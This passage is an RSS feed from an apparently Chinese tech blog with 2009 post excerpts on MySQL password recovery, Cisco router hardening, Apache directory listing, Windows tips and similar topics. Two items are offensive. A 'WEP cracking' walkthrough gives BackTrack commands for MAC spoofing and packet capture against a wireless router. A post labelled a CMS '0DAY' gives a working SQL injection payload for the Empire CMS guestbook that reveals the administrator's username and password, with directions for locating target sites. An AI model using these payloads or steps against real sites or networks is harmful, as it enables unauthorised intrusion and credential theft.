		<description><![CDATA[方法一 MySQL的密码是存储在数据库mysql中的user表中，我们需要在windows 2003下安装一个新的MySQL，然后将这个MySQL中的user表拷贝过来覆盖。 在MySQL的安装目录的 data\mysql\ 目录下有三个user表相关文件 user.frm //user表样式文件 user.MYD //user表数据文件 user.MYI //user表索引文件 将三个都拷贝过来（不过其实如果之前在要恢复的那个MySQL上没有更改过表结构的话，只要拷贝user.MYD就行了） 然后运行 #./etc/rc.d/init.d/mysql stop #./etc/rc.d/init.d/mysql start #mysql -u root -p XXXXXX 现在用windows 2003下的MySQL密码登陆 mysql&#62;use mysql; mysql&#62;update user set Password=PASSWORD(&#8216;xxxxxx&#8217;) where User=&#8217;root&#8217;; 这时候会出错，提示user表只有读权限。这是因为在windows 2003下user.*文件分配的权限是666，拷贝到后权限变成了600。其实正常情况下600是可以运行的，只是这些文件拷过来后的所有者是root，所以会出现权限不够警告，需要使用以下命令 #chown -R mysql:mysql user.* #chmod 600 user.* 重起一下MYSQL后重新进入数据库 mysql&#62;use mysql; mysql&#62;update user set Password=PASSWORD(&#8216;xxxxxx&#8217;) where User=&#8217;root&#8217;; mysql&#62;FLUSH PRIVILEGES; 值得注意的一点是，如果你windows下MySQL如果是默认配置的话，还需要执行以下命令 mysql&#62;delete [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/922/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Linux下生成随机数字</title>
		<link>http://www.i4wei.com/2009/07/905/</link>
		<comments>http://www.i4wei.com/2009/07/905/#comments</comments>
		<pubDate>Fri, 03 Jul 2009 13:20:11 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=905</guid>
		<description><![CDATA[方法一： 命令大致如下： echo $((16#`dd if=/dev/urandom bs=1 count=4 2&#62;/dev/null&#124; od -A n -t x4&#124;sed s/[^1-9a-fA-F]//g`)) 分开来看： echo $((16#ABC)) 意思是将十六进制数ABC转换成十进制数 `command` 意思是两个`中间的命令执行结果做为外壳命令的参数 /dev/urandom 是个生成随机数的设备，比/dev/random稍不安全，但产生速度极快 dd if=/dev/urndom bs=1 count=4 从随机数设备中取前4个字节(32位数) 2&#62;/dev/null 意思是将错误信息重定向到空设备中 od -A n -t x4 意思是将dd过来的数据(一个随机的32位值)进行转换输出，-A n是不输出偏移标志，-t x4是将数字用16进制输出，并且4个字节一组，这样就以16进制输出一个32位的数 sed s/[^1-9a-fA-F]//g 意思是去年输出文件中非十六进制可接受的字符(此例中主要是删除行前的空格，也可以用tr -d &#8216; &#8216;或awk &#8216;{print $1}&#8217;处理) 可以用&#8221;echo 表达式&#124;bc&#8220;生成特定运算结果，比如生成0-1023范围内的随机数： echo $((16#`dd if=/dev/urandom bs=1 count=4 2&#62;/dev/null&#124; od -A [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/905/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>14条防Cisco路由器入侵法宝</title>
		<link>http://www.i4wei.com/2009/06/878/</link>
		<comments>http://www.i4wei.com/2009/06/878/#comments</comments>
		<pubDate>Mon, 29 Jun 2009 14:33:14 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[信息安全]]></category>
		<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Cisco]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=878</guid>
		<description><![CDATA[路由器是网络系统的主要设备，也是网络安全的前沿关口。如果路由器连自身的安全都没有保障，整个网络也就毫无安全可言。因此在网络安全管理上，必须对路由器进行合理规划、配置，采取必要的安全保护措施，避免因路由器自身的安全问题而给整个网络系统带来漏洞和风险。下面是一些加强路由器安全的具体措施，用以阻止对路由器本身的攻击，并防范网络信息被窃取。 1.为路由器间的协议交换增加认证功能，提高网络安全性 路由器的一个重要功能是路由的管理和维护，目前具有一定规模的网络都采用动态的路由协议,常用的有：RIP、EIGRP、OSPF、IS-IS、BGP等。当一台设置了相同路由协议和相同区域标示符的路由器加入网络后，会学习网络上的路由信息表。但此种方法可能导致网络拓扑信息泄漏，也可能由于向网络发送自己的路由信息表，扰乱网络上正常工作的路由信息表，严重时可以使整个网络瘫痪。这个问题的解决办法是对网络内的路由器之间相互交流的路由信息进行认证。当路由器配置了认证方式，就会鉴别路由信息的收发方。有两种鉴别方式，其中“纯文本方式”安全性低，建议使用“MD5方式”。 2.路由器的物理安全防范 路由器控制端口是具有特殊权限的端口，如果攻击者物理接触路由器后，断电重启，实施“密码修复流程”，进而登录路由器，就可以完全控制路由器。 3. 保护路由器口令 在备份的路由器配置文件中，密码即使是用加密的形式存放，密码明文仍存在被破解的可能。一旦密码泄漏，网络也就毫无安全可言。 4. 阻止察看路由器诊断信息 关闭命令如下： no service tcp-small-servers no service udp-small-servers 5. 阻止查看到路由器当前的用户列表 关闭命令为： no service finger 6. 关闭CDP服务 在OSI二层协议即链路层的基础上可发现对端路由器的部分配置信息: 设备平台、操作系统版本、端口、IP地址等重要信息。可以用命令: no cdp running或no cdp enable关闭这个服务。 7. 阻止路由器接收带源路由标记的包，将带有源路由选项的数据流丢弃 “IP source-route”是一个全局配置命令，允许路由器处理带源路由选项标记的数据流。启用源路由选项后，源路由信息指定的路由使数据流能够越过默认的路由，这种包就可能绕过防火墙。关闭命令如下： no ip source-route 8. 关闭路由器广播包的转发 D.o.S攻击以有广播转发配置的路由器作为反射板，占用网络资源，甚至造成网络的瘫痪。应在每个端口应用“no ip directed-broadcast”关闭路由器广播包。 9. 管理HTTP服务 HTTP服务提供Web管理接口。“no ip http server”可以停止HTTP服务。如果必须使用HTTP，一定要使用访问列表“ip http access-class”命令，严格过滤允许的IP地址，同时用“ip http authentication ”命令设定授权限制。 [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/878/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WLAN安全 &#8211; 用BT3破解无线路由密码</title>
		<link>http://www.i4wei.com/2009/06/861/</link>
		<comments>http://www.i4wei.com/2009/06/861/#comments</comments>
		<pubDate>Fri, 26 Jun 2009 16:40:54 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[信息安全]]></category>
		<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=861</guid>
		<description><![CDATA[由于无线网络的飞速发展，时下好多个人都用起了无线路由器，默认状态下无线路由是用WEP加密的，但稍有常识的人都会知道， WEP非常特别以及极其的不安全，下面我就用BT工具来做个实验，仅仅是实验。BT是BackTrack的缩写，它是基于Slackware和SLAX的自启动运行光盘，它包含了一套安全及计算机取证工具。它其实是依靠融合Auditor Security Linux和WHAX（先前的Whoppix）而创建成的。 里面集成了好多黑客工具，非常强大。废话就不多说了，破解开始： 1. 修改无线网卡的MAC地址 airmon-ng //返回 无线网卡列表 airmon-ng stop wifi0 //停止无线网卡 ifconfig wif0 down //停止无线网络 macchanger -m 00:11:22:33:44:55 wifi0 //修改网卡的mac地址 airmon-ng start wifi0 //修改后启动，应该是两个无线网卡，例如：ath0 2. 查找无线网络 airodump-ng ath0 //成功后会出现一个列表，而且不断的有pack进出，然后ctrl+c停止 3. 抓包 这里我先假设测试的无线路由名字（ESSID）叫Techippo，频道：11，MAC地址（BSSID）：88：88：88：88：88：88 airodump-ng -c 11 -w dump &#8211;bssid 88:88:88:88:88 ath0 //dump为包的名字可随意命名 新开一个Shelll aireply-ng -1 0 -e Techippo -b 88:88:88:88:88 -h 00:11:22:33:44:55 ath0 [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/861/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>帝国CMS网站程序0DAY</title>
		<link>http://www.i4wei.com/2009/06/849/</link>
		<comments>http://www.i4wei.com/2009/06/849/#comments</comments>
		<pubDate>Fri, 26 Jun 2009 14:45:45 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=849</guid>
		<description><![CDATA[找到使用帝国CMS的站,网址后面直接加： e/tool/gbook/?bid=1 出来的是帝国CMS的留言本,在姓名处写： 縗\ 联系邮箱处写： ,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* 提交后爆出账号密码 via：amxking Like Unlike 相关文章阅读Almost all Windows users vulnerable to Flash 0-day attacksNew attacks exploit Vulnerability in Adobe FlashIntel收购McAfee 安全成为各大豪门未来战场FBI逮捕斯洛维尼亚籍黑客WPA2协议爆漏洞：或从内部遭受攻击]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/849/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>巧用NET命令轻松检查自己的网络安全</title>
		<link>http://www.i4wei.com/2009/06/752/</link>
		<comments>http://www.i4wei.com/2009/06/752/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 17:26:11 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=752</guid>
		<description><![CDATA[在进行网络安全检测的过程中，各种DOS命令是我们能够找出蛛丝马迹最得心应手的工具。但是如果掌握所有DOS命令的使用可不是一件容易的事，其实，从网络安全检测角度来看，我们只要掌握其中的三条命令即可起到较好的防范作用。 一、查看网络连接状态 一般来说，安全主要是针对连接在网络上的计算机而言的。单机用户的安全问题比较少。而于连接到网络上的计算机而言，最基本的就是对网络连接进行检测。因为不论是病毒，还是木马、黑客入侵等都是通过网络来连接的。 在“运行”窗口中输入“CMD”并回车打开命令打提示符窗口，然后输入 netstat -an 这样即可查看所有与本机建立的连接。其中Proto部分表示连接方式，Local address是本地连接地址和端口，而Foreign address则是对方的地址和端口，State是当前端口的状态。 看懂了这些信息后，我们就可以判断是否有异常的连接，如果有的话则需要断开网络进行进一步的处理。 二、查看服务运行状态 计算机的各项功能一般都是与其开放的服务相对应的。因此很多入侵者在进入电脑后会开放各种服务，由此可见检测当前系统正在运行的服务是很有必要的。 在命令提示符下输入 net start 这样即可看到系统提示“已经启动以下Windows服务”，然后从其列表中看是否不明服务在运行。如果有的话，可以继续键入“net start 服务名”来查看有关该服务更加详细的信息。确认是非法运行的服务，那么只需要运行“net stop server”命令在询问是否继续操作时按“Y”键进行确认。 三、查看账户信息 很多入侵者在突破防线后，一般都会建立相应的账户，以方便下次继续侵入。对此，我们可以在命令提示符下输入 net user 这样即可显示当前系统中已经创建的所有账户名称。如果发现不是自己创建的账户，那么则需要运行“net user 账户名称”来查看其拥有的权限，如果该用户属于Administrators等权限比较高的组的，那么可以确认该账户是黑客非法创建的，赶紧使用“net user 账户名称 /del”将其删除 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/752/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>微软搜索引擎 Bing 的使用技巧</title>
		<link>http://www.i4wei.com/2009/06/748/</link>
		<comments>http://www.i4wei.com/2009/06/748/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 15:17:53 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=748</guid>
		<description><![CDATA[微软的搜索引擎 Bing.com 已经发布了，经历被墙，现在又恢复，其实 Bing 搜索引擎在某项方面还是蛮有特点的，Digital Inspiration 发布了一篇关于 Bing 的使用技巧的文章，我简单翻译一下： 1. 使用完全功能版的 Bing 在北美之外使用 Bing，你很可能使用的是本地化版本的 Bing，那么可能就有一些 Bing 功能你无法享受，如没有搜索历史，并且 Bing 的首页图片就没有美国版本那么多交互性。 为了体验全功能版本而非阉割版的 Bing，你可以到该页把你的默认地区设置为：English – US（美国 – 英语），你就能从任何地方享受完整的 Bing。另外 Bing 还有一个叫做 Bing Tour 的网站，给你演示 Bing 的功能。 2. 在 IE 收藏栏跟踪公司股票信息 如果你搜索一些公司的股票信息（如 GOOG 或者 MSFT），Bing 会自动为这些公司创建 Web Slice，然后可以把它们加入到 IE 8 的收藏栏以便能够快速看到股票信息的变化，这个功能需要使用 IE 8 才能尝试，不过目前只有美国的 Bing 才行，并且只支持纳斯达克股票，中国两市还不支持。 3. 保存搜索结果和通过 Email [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/748/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>系统重装不愁 备份Firefox插件设置</title>
		<link>http://www.i4wei.com/2009/06/744/</link>
		<comments>http://www.i4wei.com/2009/06/744/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 13:38:28 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Firefox]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=744</guid>
		<description><![CDATA[喜欢使用Firefox的朋友，一定安装了许多插件来丰富浏览器的使用体验。但是每当重新安装Firefox浏览器后，原先安装的插件全都需要重新安装， 浪费了不少的时间。今天就介绍如何备份Firefox的方法，以后每次重装完，只要恢复一下就能还原以前的Firefox配置便可，非常方便。 Firefox浏览器的配置都被保存在下面的几个文件夹下，其实方法十分简单，只要把下面的目录备份了，再次安装Firefox之后，将这几个文件夹覆盖就可以还原以前的配置了。 c:\Documents and Settings\用户名\Application\DataMozillaFirefox c:\Documents and Settings\用户名\Local SettingsApplication\DataMozillaFirefox Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008火狐修复旧版技术漏洞 明年初将推火狐3.6版Disable the Hidden Administrative Shares]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/744/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Maxthon下Gmail无法添加附件的解决办法</title>
		<link>http://www.i4wei.com/2009/05/557/</link>
		<comments>http://www.i4wei.com/2009/05/557/#comments</comments>
		<pubDate>Thu, 07 May 2009 01:13:19 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=557</guid>
		<description><![CDATA[Gmail推出了新的附件上传方式，添加附件多了一个高级选项：显示上传进度。但是这个功能只有IE等少数浏览器支持。暂时还不支持Maxthon，360等浏览器。 要想解决问题，按一下步骤： 登录Gmail，进入Settings -&#62; General，在Attachments下选择 Basic attachment features，再进行附件上传就OK了。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/05/557/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>关闭Apache的目录浏览功能</title>
		<link>http://www.i4wei.com/2009/04/522/</link>
		<comments>http://www.i4wei.com/2009/04/522/#comments</comments>
		<pubDate>Thu, 23 Apr 2009 13:35:32 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=522</guid>
		<description><![CDATA[默认情况下，Apache是打开目录浏览功能的，其配置文件/etc/httpd/conf/httpd.conf中有如下参数： Options Indexes FollowSymLinks &#8230;&#8230; 也就是说，在目录下没有默认首页面（如：index.html index.php等）时，可以让用户直接浏览web目录架构，这可能会导致一些重要的目录或配置文件被公开。 通常在Web应用上也会做一些安全考虑，一些目录下会有类似的文件： # cat inc/index.php &#60;?php die (&#8216;Access Denied&#8217;); ?&#62; 这样，可以避免用户直接浏览该目录时，看到整个目录结构。但如果访问它下面的子目录就没什么作用了，所以，这还是不太安全。 安全起见，我建议还是把Indexes选项关闭比较好，方法有两种： 1、全局关闭 修改上面提到的配置文件/etc/httpd/conf/httpd.conf： 把 Options Indexes FollowSymLinks 改为 Options -Indexes FollowSymLinks 重启httpd服务即可，这样可以把所有网站的Indexes选项都取消。 2、修改.htaccess文件 如需要针对特定的网站取消该功能，可以先打开.htaccess支持，修改/etc/httpd/conf/httpd.conf： &#8230;&#8230; AllowOverride None &#8230;&#8230; 修改为： &#8230;&#8230; AllowOverride All &#8230;&#8230; 然后，在各网站的主目录下写入一个.htaccess文件，内容有： # head .htaccess Options -Indexes RewriteEngine on RewriteBase / &#8230;&#8230; 保存后马上生效。这时，访问同样的路径，就会报错误提示。 ※ 从服务层面去屏蔽类似的问题，会比从应用层面解决要更安全和可靠。很多应用程序的默认设置都是比较宽松的，所以，在对外公布网站的时候，务必做好类似的安全检查，防止漏洞和隐患。 Like [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/04/522/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Disable Thumbnail Preview in Windows</title>
		<link>http://www.i4wei.com/2009/03/493/</link>
		<comments>http://www.i4wei.com/2009/03/493/#comments</comments>
		<pubDate>Thu, 05 Mar 2009 17:08:42 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=493</guid>
		<description><![CDATA[This article describes a step by step process for disabling Thumbnail previews for faster computer browsing. Follow the steps below to disable thumbnail previews for a faster computer experience. The below mentioned process makes use of a simple hack which effectively makes use of regsvr32. regsvr32 is a command-line utility in Microsoft Windows operating systems [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/03/493/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Solve Problem for Opening .chm File</title>
		<link>http://www.i4wei.com/2009/03/487/</link>
		<comments>http://www.i4wei.com/2009/03/487/#comments</comments>
		<pubDate>Tue, 03 Mar 2009 20:32:25 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=487</guid>
		<description><![CDATA[This problem is a result of a security update Microsoft made which restricts opening certain files on the local network which could run malicious code. Here is a link to a description of the problem: http://support.microsoft.com/kb/896358 INSECURE SOLUTION: The solution is to modify your registry to relax the security for accessing files on your network. [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/03/487/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Shutdown or Restart Windows from Command</title>
		<link>http://www.i4wei.com/2009/03/476/</link>
		<comments>http://www.i4wei.com/2009/03/476/#comments</comments>
		<pubDate>Mon, 02 Mar 2009 19:39:02 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=476</guid>
		<description><![CDATA[In order to shutdown or restart the Windows with just one click shortcut or from command prompt or command line, users can use shutdown command line utility/command that comes with Windows 2000 (with the Resource Kit installed) and Windows XP or Windows Vista (native). To access shutdown command, simply go to DOS command prompt by [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/03/476/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
